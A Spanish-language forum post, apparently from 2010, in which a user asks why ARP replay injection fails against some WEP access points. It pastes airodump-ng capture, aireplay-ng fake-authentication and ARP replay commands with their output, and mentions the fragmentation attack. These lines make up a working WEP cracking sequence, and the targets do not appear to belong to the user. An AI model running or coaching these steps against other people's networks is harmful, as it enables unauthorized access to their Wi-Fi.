Que mosqueo llevo encima, algunos AP soy capaz de crackearlos, a veces se puede avaces no, con el mismo AP, otras ni siquiera capturo datas....
Que decir...
Tras pelearme con mi tester y conseguir hacerlo tras un rato de pruebas, me dispongo a intentarlo con otro AP:
airodump-ng -w wep -c 1 --bssid 00:22:______ mon0
Código:
CH 1 ][ Elapsed: 21 mins ][ 2010-06-30 13:24 ][ fixed channel mon0: 11
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:22:_________ -58 100 12748 1824 0 1 54e. WEP WEP OPN WLAN25D518
BSSID STATION PWR Rate Lost Packets Probes
Caputar datas de vez en cuando, pero no es viable tardaria mucho tiempo asi :S
aireplay-ng -1 0 -a 00:22_______ mon0
Código:
No source MAC (-h) specified. Using the device MAC (00:08:________________)
12:51:02 Waiting for beacon frame (BSSID: 00:22:____________) on channel 11
12:51:02 Sending Authentication Request (Open System) [ACK]
12:51:02 Authentication successful
12:51:02 Sending Association Request [ACK]
12:51:02 Association successful :-) (AID: 1)
Y supuestamente ya estoy asociado, ahora a inyectar trafico no?
aireplay-ng -3 -b 00:22:____________ mon0
Código:
No source MAC (-h) specified. Using the device MAC (00:08______________)
13:06:37 Waiting for beacon frame (BSSID: 00:22:________________) on channel 1
Saving ARP requests in replay_arp-0630-130637.cap
You should also start airodump-ng to capture replies.
14303 packets (got 0 ARP requests and 134 ACKs), sent 0 packets...(0 pps)
Y por mas que espero no suben los datas, en algunos AP suben, pero esperando, a veces al instante, otras tengo que hacer cosas con el ataque fragmentation, o me da la sensacion de que se arregla con eso, pero no actua igual en todos los ap.
Alguna idea?
Si me podeis decir que pauta a seguri, porque no se si lo estoy haciendo bien, y mirad que he leido y leido que no veas, y nada, tan facil que dicen todos que es...
Saludos